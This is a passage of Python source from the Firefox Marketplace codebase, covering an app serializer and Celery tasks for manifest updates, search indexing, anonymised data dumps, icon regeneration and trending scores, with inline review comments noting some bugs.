            'payment_account', 'payment_required', 'premium_type', 'previews',
            'price', 'price_locale', 'privacy_policy', 'public_stats',
            'release_notes', 'ratings', 'regions', 'resource_uri', 'slug',
            'status', 'support_email', 'support_url', 'supported_locales',
            'tags', 'upsell', 'upsold', 'user', 'versions', 'weekly_downloads']
    def _get_region_id(self):
        # Region is attached to the request by middleware; None if absent.
        request = self.context.get('request')
        REGION = getattr(request, 'REGION', None)
        return REGION.id if REGION else None
    def _get_region_slug(self):
        # Slug variant of _get_region_id().
        request = self.context.get('request')
        REGION = getattr(request, 'REGION', None)
        return REGION.slug if REGION else None
    def get_content_ratings(self, app):
        # Ratings body for the request's region, defaulting to 'generic'.
        body = mkt.regions.REGION_TO_RATINGS_BODY().get(
            self._get_region_slug(), 'generic')
        return {
            'body': body,
            'rating': app.get_content_ratings_by_body().get(body, None),
            'descriptors': app.get_descriptors_dehydrated().get(body, []),
            'interactives': app.get_interactives_dehydrated(),
        }
    def get_icons(self, app):
        # Map icon size -> URL for the standard icon sizes.
        return dict([(icon_size, app.get_icon_url(icon_size))
                     for icon_size in (16, 48, 64, 128)])
    def get_payment_account(self, app):
        # Avoid a query for payment_account if the app is not premium.
        if not app.is_premium():
            return None
        try:
            # This is a soon to be deprecated API property that only
            # returns the Bango account for historic compatibility.
            app_acct = app.payment_account(PROVIDER_BANGO)
            return reverse('payment-account-detail',
                           args=[app_acct.payment_account.pk])
        except app.PayAccountDoesNotExist:
            return None
    def get_payment_required(self, app):
        # True only when the app is premium with a non-free tier.
        if app.has_premium():
            tier = app.get_tier()
            return bool(tier and tier.price)
        return False
    def get_price(self, app):
        # Price in the request's region, or None if unavailable there.
        if app.has_premium():
            region = self._get_region_id()
            if region in app.get_price_region_ids():
                return app.get_price(region=region)
        return None
    def get_price_locale(self, app):
        # Locale-formatted price string for the request's region.
        if app.has_premium():
            region = self._get_region_id()
            if region in app.get_price_region_ids():
                return app.get_price_locale(region=region)
        return None
    def get_ratings_aggregates(self, app):
        return {'average': app.average_rating,
                'count': app.total_reviews}
    def get_supported_locales(self, app):
        # supported_locales may be a comma-separated string or a list.
        locs = getattr(app.current_version, 'supported_locales', '')
        if locs:
            return locs.split(',') if isinstance(locs, basestring) else locs
        else:
            return []
    def get_tags(self, app):
        return [t.tag_text for t in app.tags.all()]
    def get_upsell(self, app):
        upsell = False
        if app.upsell:
            upsell = app.upsell.premium
        # Only return the upsell app if it's public and we are not in an
        # excluded region.
        if (upsell and upsell.is_public() and self._get_region_id()
                not in upsell.get_excluded_region_ids()):
            return {
                'id': upsell.id,
                'app_slug': upsell.app_slug,
                'icon_url': upsell.get_icon_url(128),
                'name': unicode(upsell.name),
                'resource_uri': reverse('app-detail', kwargs={'pk': upsell.pk})
            }
        else:
            return False
    def get_user_info(self, app):
        # Per-user flags (developed/installed/purchased); implicitly None
        # for anonymous requests.
        user = getattr(self.context.get('request'), 'amo_user', None)
        if user:
            return {
                'developed': app.addonuser_set.filter(
                    user=user, role=amo.AUTHOR_ROLE_OWNER).exists(),
                'installed': app.has_installed(user),
                'purchased': app.pk in user.purchase_ids(),
            }
    def get_versions(self, app):
        # Disable transforms, we only need two fields: version and pk.
        # Unfortunately, cache-machine gets in the way so we can't use .only()
        # (.no_transforms() is ignored, defeating the purpose), and we can't use
        # .values() / .values_list() because those aren't cached :(
        return dict((v.version, reverse('version-detail', kwargs={'pk': v.pk}))
                    for v in app.versions.all().no_transforms())
    def get_weekly_downloads(self, app):
        # Hidden (None) unless the app has public stats.
        if app.public_stats:
            return app.weekly_downloads
    def validate_categories(self, attrs, source):
        # Require at least one category, and no more than MAX_CATEGORIES.
        if not attrs.get('categories'):
            raise serializers.ValidationError('This field is required.')
        set_categories = set(attrs[source])
        total = len(set_categories)
        max_cat = amo.MAX_CATEGORIES
        if total > max_cat:
            # L10n: {0} is the number of categories.
            raise serializers.ValidationError(ngettext(
                'You can have only {0} category.',
                'You can have only {0} categories.',
                max_cat).format(max_cat))
        return attrs
    def get_device_types(self, app):
        # Untranslated API names for the app's device types.
        with no_translation():
            return [n.api_name for n in app.device_types]
    def save_device_types(self, obj, new_types):
        # Diff the stored device types against the submitted ones and
        # create/delete rows accordingly.
        new_types = [amo.DEVICE_LOOKUP[d].id for d in new_types]
        old_types = [x.id for x in obj.device_types]
        added_devices = set(new_types) - set(old_types)
        removed_devices = set(old_types) - set(new_types)
        for d in added_devices:
            obj.addondevicetype_set.create(device_type=d)
        for d in removed_devices:
            obj.addondevicetype_set.filter(device_type=d).delete()
        # Send app to re-review queue if public and new devices are added.
        if added_devices and obj.status in amo.WEBAPPS_APPROVED_STATUSES:
            mark_for_rereview(obj, added_devices, removed_devices)
    def save_categories(self, obj, categories):
        before = set(obj.categories.values_list('id', flat=True))
        # Add new categories.
        to_add = set(c.id for c in categories) - before
        for c in to_add:
            AddonCategory.objects.create(addon=obj, category_id=c)
        # Remove old categories.
        # NOTE(review): `before` holds ids but `set(categories)` holds
        # Category objects, so this difference never subtracts the kept
        # categories — it looks like every pre-existing category row gets
        # deleted. Confirm whether `set(c.id for c in categories)` was
        # intended.
        to_remove = before - set(categories)
        for c in to_remove:
            obj.addoncategory_set.filter(category=c).delete()
    def save_upsold(self, obj, upsold):
        current_upsell = obj.upsold
        # NOTE(review): if `upsold` is given but obj.upsold is None,
        # `obj.upsold.free` raises AttributeError — confirm callers
        # guarantee otherwise. Also, `log` is not among this module's
        # visible imports — verify it resolves at runtime.
        if upsold and upsold != obj.upsold.free:
            if not current_upsell:
                log.debug('[1@%s] Creating app upsell' % obj.pk)
                current_upsell = AddonUpsell(premium=obj)
            current_upsell.free = upsold
            current_upsell.save()
        elif current_upsell:
            # We're deleting the upsell.
            log.debug('[1@%s] Deleting the app upsell' % obj.pk)
            current_upsell.delete()
    def save_price(self, obj, price):
        # Create or update the app's AddonPremium with the matching tier.
        premium = obj.premium
        if not premium:
            premium = AddonPremium()
            premium.addon = obj
        premium.price = Price.objects.active().get(price=price)
        premium.save()
    def validate_device_types(self, attrs, source):
        if attrs.get('device_types') is None:
            raise serializers.ValidationError('This field is required.')
        for v in attrs['device_types']:
            if v not in amo.DEVICE_LOOKUP.keys():
                raise serializers.ValidationError(
                    str(v) + ' is not one of the available choices.')
        return attrs
    def validate_price(self, attrs, source):
        # Premium apps must carry a valid, non-zero price tier.
        if attrs.get('premium_type', None) not in (amo.ADDON_FREE,
                                                   amo.ADDON_FREE_INAPP):
            valid_prices = Price.objects.exclude(
                price='0.00').values_list('price', flat=True)
            price = attrs.get('price')
            if not (price and Decimal(price) in valid_prices):
                raise serializers.ValidationError(
                    'Premium app specified without a valid price. Price can be'
                    ' one of %s.' % (', '.join('"%s"' % str(p)
                                               for p in valid_prices),))
        return attrs
    def restore_object(self, attrs, instance=None):
        # restore_object creates or updates a model instance, during
        # input validation.
        extras = []
        # Upsell bits are handled here because we need to remove it
        # from the attrs dict before deserializing.
        upsold = attrs.pop('upsold.free', None)
        if upsold is not None:
            extras.append((self.save_upsold, upsold))
        price = attrs.pop('price', None)
        if price is not None:
            extras.append((self.save_price, price))
        device_types = attrs['device_types']
        if device_types:
            extras.append((self.save_device_types, device_types))
            del attrs['device_types']
        instance = super(AppSerializer, self).restore_object(
            attrs, instance=instance)
        # Apply the deferred side-effect savers against the new instance.
        for f, v in extras:
            f(instance, v)
        return instance
    def save_object(self, obj, **kwargs):
        # this only gets called if validation succeeds.
        m2m = getattr(obj, '_m2m_data', {})
        cats = m2m.pop('categories', None)
        super(AppSerializer, self).save_object(obj, **kwargs)
        # Categories are handled here because we can't look up
        # existing ones until the initial save is done.
        self.save_categories(obj, cats)
class SimpleAppSerializer(AppSerializer):
    """
    App serializer with fewer fields (and fewer db queries as a result).
    Used as a base for FireplaceAppSerializer and CollectionAppSerializer.
    """
    # Lighter preview serialization than the parent's PreviewSerializer.
    previews = SimplePreviewSerializer(many=True, required=False,
                                       source='all_previews')
    class Meta(AppSerializer.Meta):
        exclude = ['absolute_url', 'app_type', 'categories', 'created',
                   'default_locale', 'payment_account', 'supported_locales',
                   'weekly_downloads', 'upsold', 'tags']
########NEW FILE########
__FILENAME__ = tasks
import datetime
import hashlib
import json
import logging
import os
import shutil
import subprocess
import time
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.template import Context, loader
import pytz
import requests
from celery import chord
from celery.exceptions import RetryTaskError
from celeryutils import task
from pyelasticsearch.exceptions import ElasticHttpNotFoundError
from requests.exceptions import RequestException
from test_utils import RequestFactory
from tower import ugettext as _
import amo
import mkt
from addons.models import Addon
from amo.decorators import use_master, write
from amo.helpers import absolutify
from amo.utils import chunked, days_ago, JSONEncoder, send_mail_jinja
from editors.models import RereviewQueue
from files.models import FileUpload
from files.utils import WebAppParser
from lib.es.utils import get_indices
from lib.metrics import get_monolith_client
from lib.post_request_task.task import task as post_request_task
from mkt.constants.regions import RESTOFWORLD
from mkt.developers.tasks import (_fetch_manifest, fetch_icon, pngcrush_image,
resize_preview, validator)
from mkt.webapps.models import AppManifest, Webapp, WebappIndexer
from mkt.webapps.utils import get_locale_properties
from users.models import UserProfile
from users.utils import get_task_user
task_log = logging.getLogger('z.task')
def _get_content_hash(content):
return 'sha256:%s' % hashlib.sha256(content).hexdigest()
def _log(webapp, message, rereview=False, exc_info=False):
    """Log an info message tagged with the webapp id, optionally marked
    as coming from re-review handling."""
    text = unicode(message)
    if rereview:
        text = u'(Re-review) ' + text
    task_log.info(u'[Webapp:%s] %s' % (webapp, text), exc_info=exc_info)
@task
@write
def update_manifests(ids, **kw):
    """Re-fetch and re-validate the manifests for the given webapp ids.

    Fetch failures are tallied per-app in `retries`; if any remain, the
    task re-queues itself for just those apps (up to 5 times, an hour
    apart). Returns the `retries` dict.
    """
    retry_secs = 3600
    task_log.info('[%s@%s] Update manifests.' %
                  (len(ids), update_manifests.rate_limit))
    check_hash = kw.pop('check_hash', True)
    retries = kw.pop('retries', {})
    # Since we'll be logging the updated manifest change to the users log,
    # we'll need to log in as user.
    amo.set_user(get_task_user())
    for id in ids:
        _update_manifest(id, check_hash, retries)
    if retries:
        try:
            # Celery signals a scheduled retry by raising RetryTaskError;
            # it is caught below so this task still returns `retries`.
            update_manifests.retry(args=(retries.keys(),),
                                   kwargs={'check_hash': check_hash,
                                           'retries': retries},
                                   eta=datetime.datetime.now() +
                                   datetime.timedelta(seconds=retry_secs),
                                   max_retries=5)
        except RetryTaskError:
            # NOTE(review): `id` here is whatever the loop left behind,
            # not necessarily a retried app — confirm the log target.
            _log(id, 'Retrying task in %d seconds.' % retry_secs)
    return retries
def notify_developers_of_failure(app, error_message, has_link=False):
    """Email every author of `app` about a manifest-update failure.

    Skipped when the app is not in an approved status or is already in
    the re-review queue.
    """
    if (app.status not in amo.WEBAPPS_APPROVED_STATUSES or
        RereviewQueue.objects.filter(addon=app).exists()):
        # If the app isn't public, or has already been reviewed, we don't
        # want to send the mail.
        return
    # FIXME: how to integrate with commbadge?
    for author in app.authors.all():
        context = {
            'error_message': error_message,
            'SITE_URL': settings.SITE_URL,
            'MKT_SUPPORT_EMAIL': settings.MKT_SUPPORT_EMAIL,
            'has_link': has_link
        }
        to = [author.email]
        with author.activate_lang():
            # Re-fetch the app to get translations in the right language.
            context['app'] = Webapp.objects.get(pk=app.pk)
            subject = _(u'Issue with your app "{app}" on the Firefox '
                        u'Marketplace').format(**context)
            send_mail_jinja(subject,
                            'webapps/emails/update_manifest_failure.txt',
                            context, recipient_list=to)
def _update_manifest(id, check_hash, failed_fetches):
    """Fetch, validate and apply an updated manifest for webapp `id`.

    `failed_fetches` is a shared dict of id -> consecutive failure count;
    on the 3rd failure the developers are emailed, on the 4th the app is
    flagged for re-review and the counter is cleared. If the (optional)
    hash check shows the manifest changed and it validates, a new
    version/file is created and name/locale/developer-name changes may
    flag the app for re-review and/or refresh IARC storefront data.
    """
    webapp = Webapp.objects.get(pk=id)
    version = webapp.versions.latest()
    file_ = version.files.latest()

    _log(webapp, u'Fetching webapp manifest')
    if not file_:
        _log(webapp, u'Ignoring, no existing file')
        return

    # Fetch manifest, catching and logging any exception.
    try:
        content = _fetch_manifest(webapp.manifest_url)
    except Exception, e:
        msg = u'Failed to get manifest from %s. Error: %s' % (
            webapp.manifest_url, e)
        failed_fetches[id] = failed_fetches.get(id, 0) + 1
        if failed_fetches[id] == 3:
            # This is our 3rd attempt, let's send the developer(s) an email to
            # notify him of the failures.
            notify_developers_of_failure(webapp, u'Validation errors:\n' + msg)
        elif failed_fetches[id] >= 4:
            # This is our 4th attempt, we should already have notified the
            # developer(s). Let's put the app in the re-review queue.
            _log(webapp, msg, rereview=True, exc_info=True)
            if webapp.status in amo.WEBAPPS_APPROVED_STATUSES:
                RereviewQueue.flag(webapp, amo.LOG.REREVIEW_MANIFEST_CHANGE,
                                   msg)
            del failed_fetches[id]
        else:
            _log(webapp, msg, rereview=False, exc_info=True)
        return

    # Check hash; bail out early if the manifest hasn't changed.
    if check_hash:
        hash_ = _get_content_hash(content)
        if file_.hash == hash_:
            _log(webapp, u'Manifest the same')
            return
        _log(webapp, u'Manifest different')

    # Validate the new manifest.
    upload = FileUpload.objects.create()
    upload.add_file([content], webapp.manifest_url, len(content),
                    is_webapp=True)

    validator(upload.pk)

    upload = FileUpload.objects.get(pk=upload.pk)
    if upload.validation:
        v8n = json.loads(upload.validation)
        if v8n['errors']:
            v8n_url = absolutify(reverse(
                'mkt.developers.upload_detail', args=[upload.uuid]))
            msg = u'Validation errors:\n'
            for m in v8n['messages']:
                if m['type'] == u'error':
                    msg += u'* %s\n' % m['message']
            msg += u'\nValidation Result:\n%s' % v8n_url
            _log(webapp, msg, rereview=True)
            if webapp.status in amo.WEBAPPS_APPROVED_STATUSES:
                notify_developers_of_failure(webapp, msg, has_link=True)
                RereviewQueue.flag(webapp, amo.LOG.REREVIEW_MANIFEST_CHANGE,
                                   msg)
            return
    else:
        _log(webapp,
             u'Validation for upload UUID %s has no result' % upload.uuid)

    # Get the old manifest before we overwrite it.
    new = json.loads(content)
    old = webapp.get_manifest_json(file_)

    # New manifest is different and validates, update version/file.
    try:
        webapp.manifest_updated(content, upload)
    except:
        _log(webapp, u'Failed to create version', exc_info=True)

    # Check for any name changes at root and in locales. If any were added or
    # updated, send to re-review queue.
    msg = []
    rereview = False
    # Some changes require a new call to IARC's SET_STOREFRONT_DATA.
    iarc_storefront = False

    if old and old.get('name') != new.get('name'):
        rereview = True
        iarc_storefront = True
        msg.append(u'Manifest name changed from "%s" to "%s".' % (
            old.get('name'), new.get('name')))

    new_version = webapp.versions.latest()
    # Compare developer_name between old and new version using the property
    # that fallbacks to the author name instead of using the db field directly.
    # This allows us to avoid forcing a re-review on old apps which didn't have
    # developer name in their manifest initially and upload a new version that
    # does, providing that it matches the original author name.
    if version.developer_name != new_version.developer_name:
        rereview = True
        iarc_storefront = True
        msg.append(u'Developer name changed from "%s" to "%s".'
                   % (version.developer_name, new_version.developer_name))

    # Get names in "locales" as {locale: name}.
    locale_names = get_locale_properties(new, 'name', webapp.default_locale)

    # Check changes to default_locale.
    locale_changed = webapp.update_default_locale(new.get('default_locale'))
    if locale_changed:
        msg.append(u'Default locale changed from "%s" to "%s".'
                   % locale_changed)

    # Update names
    crud = webapp.update_names(locale_names)
    if any(crud.values()):
        webapp.save()

    if crud.get('added'):
        rereview = True
        msg.append(u'Locales added: %s' % crud.get('added'))
    if crud.get('updated'):
        rereview = True
        msg.append(u'Locales updated: %s' % crud.get('updated'))

    # Check if supported_locales changed and update if so.
    webapp.update_supported_locales(manifest=new)

    if rereview:
        msg = ' '.join(msg)
        _log(webapp, msg, rereview=True)
        if webapp.status in amo.WEBAPPS_APPROVED_STATUSES:
            RereviewQueue.flag(webapp, amo.LOG.REREVIEW_MANIFEST_CHANGE, msg)

    if iarc_storefront:
        webapp.set_iarc_storefront_data()
@task
def update_cached_manifests(id, **kw):
    """Rebuild the cached mini manifest for a packaged app."""
    webapp = None
    try:
        webapp = Webapp.objects.get(pk=id)
    except Webapp.DoesNotExist:
        _log(id, u'Webapp does not exist')

    if webapp is None or not webapp.is_packaged:
        return

    # Force a rebuild of the packaged app's mini manifest in the cache.
    webapp.get_cached_manifest(force=True)
    _log(webapp, u'Updated cached mini manifest')
@task
@write
def add_uuids(ids, **kw):
    """Ensure every webapp in `ids` has a guid."""
    for id_chunk in chunked(ids, 50):
        for webapp in Webapp.objects.filter(id__in=id_chunk):
            # Saving generates a guid when the app doesn't already have one.
            webapp.save()
@task
@write
def update_supported_locales(ids, **kw):
    """Refresh each app's supported locales from its current version.

    Intended to be run via the command line across many apps.
    """
    for id_chunk in chunked(ids, 50):
        for webapp in Webapp.objects.filter(id__in=id_chunk):
            try:
                if webapp.update_supported_locales():
                    _log(webapp, u'Updated supported locales')
            except Exception:
                # Keep going; one broken app shouldn't stop the batch.
                _log(webapp, u'Updating supported locales failed.',
                     exc_info=True)
@post_request_task(acks_late=True)
@write
def index_webapps(ids, **kw):
    """(Re-)index the given webapp ids into Elasticsearch.

    Queries `with_deleted`, so soft-deleted apps can still be re-indexed.
    """
    task_log.info('Indexing apps %s-%s. [%s]' % (ids[0], ids[-1], len(ids)))

    index = kw.pop('index', WebappIndexer.get_index())
    # Note: If reindexing is currently occurring, `get_indices` will return
    # more than one index.
    indices = get_indices(index)

    es = WebappIndexer.get_es(urls=settings.ES_URLS)
    qs = Webapp.indexing_transformer(Webapp.with_deleted.no_cache().filter(
        id__in=ids))
    for obj in qs:
        doc = WebappIndexer.extract_document(obj.id, obj)
        # Write the document into every active index (may be several
        # while a reindex is in flight).
        for idx in indices:
            WebappIndexer.index(doc, id_=obj.id, es=es, index=idx)
@post_request_task(acks_late=True)
@write
def unindex_webapps(ids, **kw):
    """Remove the given webapp ids from every active Elasticsearch index."""
    if not ids:
        return

    task_log.info('Un-indexing apps %s-%s. [%s]' % (ids[0], ids[-1], len(ids)))

    index = kw.pop('index', WebappIndexer.get_index())
    # Note: If reindexing is currently occurring, `get_indices` will return
    # more than one index.
    indices = get_indices(index)

    es = WebappIndexer.get_es(urls=settings.ES_URLS)
    for id_ in ids:
        for idx in indices:
            try:
                WebappIndexer.unindex(id_=id_, es=es, index=idx)
            except ElasticHttpNotFoundError:
                # Ignore if it's not there.
                task_log.info(
                    u'[Webapp:%s] Unindexing app but not found in index' % id_)
@task
def dump_app(id, **kw):
    """Serialize one webapp to JSON under DUMPED_APPS_PATH/apps/<id//1000>/.

    Returns the path of the written file, or None if the app is gone.
    """
    from mkt.webapps.serializers import AppSerializer
    # Because @robhudson told me to.
    # Note: not using storage because all these operations should be local.
    # Use floor division so the shard directory name stays an integer
    # string even under true division (Python 3 / __future__.division).
    target_dir = os.path.join(settings.DUMPED_APPS_PATH, 'apps',
                              str(id // 1000))
    target_file = os.path.join(target_dir, str(id) + '.json')

    try:
        obj = Webapp.objects.get(pk=id)
    except Webapp.DoesNotExist:
        task_log.info(u'Webapp does not exist: {0}'.format(id))
        return

    # Serialize against an anonymous rest-of-world request so no
    # user/region-specific data ends up in the dump.
    req = RequestFactory().get('/')
    req.user = AnonymousUser()
    req.REGION = RESTOFWORLD

    if not os.path.exists(target_dir):
        os.makedirs(target_dir)

    task_log.info('Dumping app {0} to {1}'.format(id, target_file))
    res = AppSerializer(obj, context={'request': req}).data
    # Use a context manager so the file handle is closed deterministically
    # (the previous code leaked the handle returned by open()).
    with open(target_file, 'w') as fh:
        json.dump(res, fh, cls=JSONEncoder)
    return target_file
@task
def clean_apps(pks, **kw):
    """Delete the dumped-apps directory, then pass `pks` straight through."""
    rm_directory(os.path.join(settings.DUMPED_APPS_PATH, 'apps'))
    return pks
@task(ignore_result=False)
def dump_apps(ids, **kw):
    """Dump each webapp id in `ids` to its JSON file via dump_app()."""
    task_log.info(u'Dumping apps {0} to {1}. [{2}]'
                  .format(ids[0], ids[-1], len(ids)))
    for app_id in ids:
        dump_app(app_id)
@task
def zip_apps(*args, **kw):
    """Compress today's app dump (plus the generated txt files) to a tarball."""
    today = datetime.datetime.today().strftime('%Y-%m-%d')
    extra = compile_extra_files(date=today)
    return compress_export(filename=today, files=['apps'] + extra)
def rm_directory(path):
    """Recursively delete `path`; silently do nothing if it doesn't exist."""
    if not os.path.exists(path):
        return
    shutil.rmtree(path)
def dump_all_apps_tasks():
    """Build dump_apps subtasks covering every visible app, 100 pks apiece."""
    visible_pks = (Webapp.objects.visible()
                   .values_list('pk', flat=True)
                   .order_by('pk'))
    return [dump_apps.si(pk_chunk) for pk_chunk in chunked(visible_pks, 100)]
@task
def export_data(name=None):
    """Dump all apps and collections, then compress everything to a tarball.

    `name` is the tarball base name; defaults to today's date.
    """
    from mkt.collections.tasks import dump_all_collections_tasks
    today = datetime.datetime.today().strftime('%Y-%m-%d')
    if name is None:
        name = today
    root = settings.DUMPED_APPS_PATH
    directories = ['apps', 'collections']
    # Start from a clean slate so stale dumps can't end up in the tarball.
    for directory in directories:
        rm_directory(os.path.join(root, directory))
    files = directories + compile_extra_files(date=today)
    # Fan out all the dump subtasks, then compress once they all finish.
    chord(dump_all_apps_tasks() + dump_all_collections_tasks(),
          compress_export.si(filename=name, files=files)).apply_async()
def compile_extra_files(date):
    """Render license.txt and readme.txt into DUMPED_APPS_PATH.

    Returns the list of file names that were successfully written.
    """
    # Put some .txt files in place.
    context = Context({'date': date, 'url': settings.SITE_URL})
    files = ['license.txt', 'readme.txt']
    if not os.path.exists(settings.DUMPED_APPS_PATH):
        os.makedirs(settings.DUMPED_APPS_PATH)
    created_files = []
    for f in files:
        template = loader.get_template('webapps/dump/apps/' + f)
        dest = os.path.join(settings.DUMPED_APPS_PATH, f)
        # Use a context manager so the handle is closed deterministically
        # (the previous open(dest, 'w').write(...) leaked it).
        with open(dest, 'w') as fh:
            fh.write(template.render(context))
        created_files.append(f)
    return created_files
@task
def compress_export(filename, files):
    """Tar+gzip `files` (relative to DUMPED_APPS_PATH) into
    tarballs/<filename>.tgz and return the tarball path."""
    # Note: not using storage because all these operations should be local.
    target_dir = os.path.join(settings.DUMPED_APPS_PATH, 'tarballs')
    target_file = os.path.join(target_dir, filename + '.tgz')
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    # Run tar from inside DUMPED_APPS_PATH so archive paths stay relative.
    cmd = ['tar', 'czf', target_file, '-C',
           settings.DUMPED_APPS_PATH] + files
    task_log.info(u'Creating dump {0}'.format(target_file))
    subprocess.call(cmd)
    return target_file
@task(ignore_result=False)
def dump_user_installs(ids, **kw):
    """Dump each user's installed apps to an anonymized JSON file.

    Users are keyed by a SECRET_KEY-salted sha256 of their id, so the
    dump never exposes raw user ids; files are sharded by the first hex
    character of that hash.
    """
    task_log.info(u'Dumping user installs {0} to {1}. [{2}]'
                  .format(ids[0], ids[-1], len(ids)))

    for user_id in ids:
        try:
            user = UserProfile.objects.get(pk=user_id)
        except UserProfile.DoesNotExist:
            task_log.info('User profile does not exist: {0}'.format(user_id))
            continue

        hash = hashlib.sha256('%s%s' % (str(user.id),
                                        settings.SECRET_KEY)).hexdigest()
        target_dir = os.path.join(settings.DUMPED_USERS_PATH, 'users', hash[0])
        target_file = os.path.join(target_dir, '%s.json' % hash)

        if not os.path.exists(target_dir):
            try:
                os.makedirs(target_dir)
            except OSError:
                pass  # Catch race condition if file exists now.

        # Gather data about user.
        installed = []
        zone = pytz.timezone(settings.TIME_ZONE)
        for install in user.installed_set.filter(addon__type=amo.ADDON_WEBAPP):
            try:
                app = install.addon
            except Addon.DoesNotExist:
                continue

            # Install timestamps are stored in local time; normalize to UTC.
            installed.append({
                'id': app.id,
                'slug': app.app_slug,
                'installed': pytz.utc.normalize(
                    zone.localize(install.created)).strftime(
                        '%Y-%m-%dT%H:%M:%S')
            })

        data = {
            'user': hash,
            'region': user.region,
            'lang': user.lang,
            'installed_apps': installed,
        }

        task_log.info('Dumping user {0} to {1}'.format(user.id, target_file))
        # Use a context manager so the file handle is closed deterministically
        # (the previous code leaked the handle returned by open()).
        with open(target_file, 'w') as fh:
            json.dump(data, fh, cls=JSONEncoder)
@task
def zip_users(*args, **kw):
    """Render the user-dump txt files and tar the 'users' tree into a
    dated tarball; returns the tarball path."""
    # Note: not using storage because all these operations should be local.
    today = datetime.datetime.utcnow().strftime('%Y-%m-%d')
    target_dir = os.path.join(settings.DUMPED_USERS_PATH, 'tarballs')
    target_file = os.path.join(target_dir, '{0}.tgz'.format(today))

    if not os.path.exists(target_dir):
        os.makedirs(target_dir)

    # Put some .txt files in place.
    context = Context({'date': today, 'url': settings.SITE_URL})
    files = ['license.txt', 'readme.txt']
    for f in files:
        template = loader.get_template('webapps/dump/users/' + f)
        dest = os.path.join(settings.DUMPED_USERS_PATH, 'users', f)
        # Use a context manager so the handle is closed deterministically
        # (the previous open(dest, 'w').write(...) leaked it each loop).
        with open(dest, 'w') as fh:
            fh.write(template.render(context))

    cmd = ['tar', 'czf', target_file, '-C',
           settings.DUMPED_USERS_PATH, 'users']
    task_log.info(u'Creating user dump {0}'.format(target_file))
    subprocess.call(cmd)
    return target_file
def _fix_missing_icons(id):
    """Re-fetch icons for webapp `id` if any required size is missing.

    Returns the result of fetch_icon() when a re-fetch was triggered,
    otherwise None.
    """
    try:
        webapp = Webapp.objects.get(pk=id)
    except Webapp.DoesNotExist:
        _log(id, u'Webapp does not exist')
        return

    # Check for missing icons. If we find one important size missing, call
    # fetch_icon for this app.
    dirname = webapp.get_icon_dir()
    destination = os.path.join(dirname, '%s' % webapp.id)
    for size in (64, 128):
        filename = '%s-%s.png' % (destination, size)
        if not storage.exists(filename):
            _log(id, u'Webapp is missing icon size %d' % (size, ))
            return fetch_icon(webapp)
@task
@write
def fix_missing_icons(ids, **kw):
    """Task wrapper: check/re-fetch icons for every webapp id in `ids`."""
    for webapp_id in ids:
        _fix_missing_icons(webapp_id)
def _regenerate_icons_and_thumbnails(pk):
    """Re-generate preview thumbnails and crush the 64x64 icon for one app."""
    try:
        webapp = Webapp.objects.get(pk=pk)
    except Webapp.DoesNotExist:
        # Log the missing pk. (The previous code passed `id` here, which
        # resolved to the `id` builtin, not the requested primary key.)
        _log(pk, u'Webapp does not exist')
        return

    # Previews.
    for preview in webapp.all_previews:
        # Re-resize each preview by calling the task with the image that we
        # have and asking the task to only deal with the thumbnail. We no
        # longer have the original, but it's fine, the image should be large
        # enough for us to generate a thumbnail.
        resize_preview.delay(preview.image_path, preview, generate_image=False)

    # Icons. The only thing we need to do is crush the 64x64 icon.
    icon_path = os.path.join(webapp.get_icon_dir(), '%s-64.png' % webapp.id)
    pngcrush_image.delay(icon_path)
@task
@write
def regenerate_icons_and_thumbnails(ids, **kw):
    """Task wrapper: regenerate icons/thumbnails for each app pk in `ids`."""
    for pk in ids:
        # Removed the stray trailing semicolon the old call carried.
        _regenerate_icons_and_thumbnails(pk)
@task
@write
def import_manifests(ids, **kw):
    """Backfill AppManifest rows from the on-disk manifest of every version
    of the given webapps; existing rows are left untouched."""
    for app in Webapp.objects.filter(id__in=ids):
        for version in app.versions.all():
            try:
                file_ = version.files.latest()
                # Disabled files live in the guarded path.
                if file_.status == amo.STATUS_DISABLED:
                    file_path = file_.guarded_file_path
                else:
                    file_path = file_.file_path
                manifest = WebAppParser().get_json_data(file_path)
                m, c = AppManifest.objects.get_or_create(
                    version=version, manifest=json.dumps(manifest))
                if c:
                    task_log.info(
                        '[Webapp:%s] Imported manifest for version %s' % (
                            app.id, version.id))
                else:
                    task_log.info(
                        '[Webapp:%s] App manifest exists for version %s' % (
                            app.id, version.id))
            except Exception as e:
                # Best-effort import: log and move on to the next version.
                task_log.info('[Webapp:%s] Error loading manifest for version '
                              '%s: %s' % (app.id, version.id, e))
def _get_trending(app_id, region=None):
    """
    Calculate trending.

    a = installs from 7 days ago to now
    b = installs from 28 days ago to 8 days ago, averaged per week
    trending = (a - b) / b if a > 100 and b > 1 else 0

    Monolith/ES failures are swallowed (logged) and treated as 0 installs.
    """
    client = get_monolith_client()

    kwargs = {'app-id': app_id}
    if region:
        kwargs['region'] = region.slug

    today = datetime.datetime.today()

    # If we query monolith with interval=week and the past 7 days
    # crosses a Monday, Monolith splits the counts into two. We want
    # the sum over the past week so we need to `sum` these.
    try:
        count_1 = sum(
            c['count'] for c in
            client('app_installs', days_ago(7), today, 'week', **kwargs)
            if c.get('count'))
    except ValueError as e:
        task_log.info('Call to ES failed: {0}'.format(e))
        count_1 = 0

    # If count_1 isn't more than 100, stop here to avoid extra Monolith calls.
    if not count_1 > 100:
        return 0.0

    # Get the average installs for the prior 3 weeks. Don't use the `len` of
    # the returned counts because of week boundaries.
    try:
        count_3 = sum(
            c['count'] for c in
            client('app_installs', days_ago(28), days_ago(8), 'week', **kwargs)
            if c.get('count')) / 3
    except ValueError as e:
        task_log.info('Call to ES failed: {0}'.format(e))
        count_3 = 0

    if count_3 > 1:
        return (count_1 - count_3) / count_3
    else:
        return 0.0
@task
@write
def update_trending(ids, **kw):
    """Recompute global and per-region trending values for the given apps."""
    count = 0
    times = []

    for app in Webapp.objects.filter(id__in=ids).no_transforms():
        count += 1
        t_start = time.time()

        # Calculate global trending, then per-region trending below.
        value = _get_trending(app.id)
        if value:
            trending, created = app.trending.get_or_create(
                region=0, defaults={'value': value})
            if not created:
                trending.update(value=value)

        for region in mkt.regions.REGIONS_DICT.values():
            value = _get_trending(app.id, region)
            if value:
                trending, created = app.trending.get_or_create(
                    region=region.id, defaults={'value': value})
                if not created:
                    trending.update(value=value)

        times.append(time.time() - t_start)

    # Guard against ZeroDivisionError when no app matched `ids`.
    if count:
        task_log.info('Trending calculated for %s apps. Avg time overall: '
                      '%0.2fs' % (count, sum(times) / count))
@task
@write
def update_downloads(ids, **kw):
